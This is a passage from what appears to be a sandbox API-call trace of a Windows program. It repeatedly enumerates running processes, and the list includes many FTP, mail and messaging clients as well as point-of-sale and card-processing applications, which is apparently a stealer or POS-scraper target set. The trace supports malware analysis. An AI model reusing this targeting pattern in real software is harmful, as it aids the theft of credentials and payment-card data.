Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0292.590] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0292.593] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.596] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0292.602] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0292.605] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0292.607] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0292.611] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0292.614] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0292.622] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0292.625] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0292.628] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0292.631] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0292.634] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0292.637] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0292.640] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0292.644] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0292.647] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0292.650] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0292.661] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0292.664] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0292.666] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0292.669] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0292.672] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0292.676] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0292.678] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0292.706] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0292.710] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0292.716] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0292.719] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0292.722] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0292.725] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0292.727] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0292.744] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0292.746] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0292.750] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0292.753] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0292.755] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0292.757] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0292.761] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.763] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0292.766] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.768] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.770] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0292.772] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.774] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0292.776] CloseHandle (hObject=0x140c) returned 1 [0292.776] Sleep (dwMilliseconds=0x64) [0292.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0292.790] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.792] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.794] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.796] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.797] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.800] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.802] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.804] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.805] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.807] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.809] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.812] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.814] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.815] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.817] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.819] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.821] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.823] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.825] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.827] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.829] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.831] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.833] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.835] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.839] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.841] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.844] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0292.845] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0292.847] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0292.849] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.851] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.853] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.856] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0292.858] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.860] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.862] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.864] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.866] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.868] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 